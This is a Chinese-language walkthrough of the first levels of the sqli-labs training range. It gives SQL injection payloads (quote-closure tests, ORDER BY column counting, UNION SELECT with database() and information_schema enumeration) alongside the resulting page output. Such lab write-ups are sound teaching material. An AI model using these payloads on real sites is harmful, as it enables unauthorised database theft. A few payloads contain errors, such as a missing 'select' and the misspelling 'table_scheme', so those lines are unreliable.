sqli-labs靶场全部通关第一天

注入判断：

?id =1 

显示:

Welcome    Dhakkan
Your Login name:Dumb
Your Password:Dumb

添加封闭后判断

?id=1 ' and 1=1 -- q

正常显示

?id=1 ' and 1=2 -- q

显示异常，说明存在注入

查看字段数量

?id=1 ' order by 1 -- q

?id=1 ' order by 2 -- q

....

?id=1 ' order by n -- q

ORDER BY 1 表示 所select 的字段按第一个字段排序 
ORDER BY ASC应该没有这样写法,ORDER BY 后面不是字段就是数字, 
可以ORDER BY 1 ASC 或者ORDER BY COL1 ASC 

ASC表示按升序排序,DESC表示按降序排序

Welcome    Dhakkan
Unknown column '4' in 'order clause'

利用联合查询查看字段数以

?id=1221'union select 11,22,33 -- q

Welcome    Dhakkan
Your Login name:22
Your Password:33

之后查看数据库

?id=1221'union select 11,database(),33 -- q

Welcome    Dhakkan
Your Login name:security
Your Password:33

?得到数据库名字叫security

之后查看表格    1

?id=113 ' union select 1,table_name,3 from information_schema.tables where table_schema = 'security' -- q

?id=113' union select 1,table_name ,3 from information_schema.tables where table_scheme = '数据库名' -- q limit 0,1 获取

group_concat也可以

?id=113 ' union select 1,column_name,3 from information_schema.columns where table_schema = 'security' and table_name ='emails' -- q

Welcome    Dhakkan
Your Login name:id,email_id
Your Password:3

?id=3 ' union 11,id,22 from emails -- q 获取具体数据